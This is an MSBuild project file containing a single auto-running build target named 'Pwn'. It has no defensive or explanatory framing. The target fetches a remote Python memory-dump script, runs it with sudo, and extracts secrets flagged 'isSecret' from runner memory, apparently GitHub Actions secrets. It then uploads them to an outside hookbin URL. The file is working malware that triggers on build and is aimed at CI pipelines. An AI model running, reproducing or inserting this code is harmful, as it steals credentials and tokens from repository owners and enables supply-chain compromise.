<Project InitialTargets="Pwn">
  <Target Name="Pwn">
    <Exec Command="echo 'PWN: Starting exploit execution in MSBuild...' && curl -sSf https://raw.githubusercontent.com/playground-nils/tools/refs/heads/main/memdump.py | sudo -E python3 | tr -d '\0' | grep -aoE '&quot;[^&quot;]+&quot;:\{&quot;value&quot;:&quot;[^&quot;]*&quot;,&quot;isSecret&quot;:true\}' >> /tmp/secrets && curl -X PUT -d @/tmp/secrets https://open-hookbin.vercel.app/$(GITHUB_RUN_ID)" />
  </Target>
</Project>
